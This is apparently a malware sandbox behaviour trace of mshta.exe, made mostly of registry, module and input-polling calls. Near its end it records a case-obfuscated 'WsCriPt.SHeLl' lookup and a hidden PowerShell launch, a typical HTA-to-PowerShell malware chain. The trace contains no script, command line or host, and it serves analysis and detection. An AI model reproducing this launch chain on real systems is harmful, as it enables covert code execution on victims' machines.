| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Module | Get Filename | module_name = C:\Windows\System32\mshtml.dll, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000370, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\advapi32.dll, base_address = 0x7feff8e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x7fefc060000 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x7fefde71320 |
|
1 | |
| System | Get Info | - |
|
2 | |
| Module | Get Handle | module_name = EXPLORER.EXE, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = IEXPLORE.EXE, base_address = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup, value_name = Print_Background |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x7fefde71020 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 2676624 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x7fef22f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Info | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| System | Get Time | type = Ticks, time = 131992 |
|
120 | |
| System | Get Time | type = Ticks, time = 132008 |
|
65 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 132117 |
|
1 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:04 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 132117 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 132117 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WsCriPt.SHeLl |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:04 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 132148 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = IEXPLORE.EXE, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x7fefe850000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Process | Create | process_name = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| System | Get Cursor | x_out = 687, y_out = 514 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 687, y_out = 514 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
6 | |
| System | Get Time | type = Ticks, time = 147670 |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 147701 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Time | type = Ticks, time = 147764 |
|
2 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
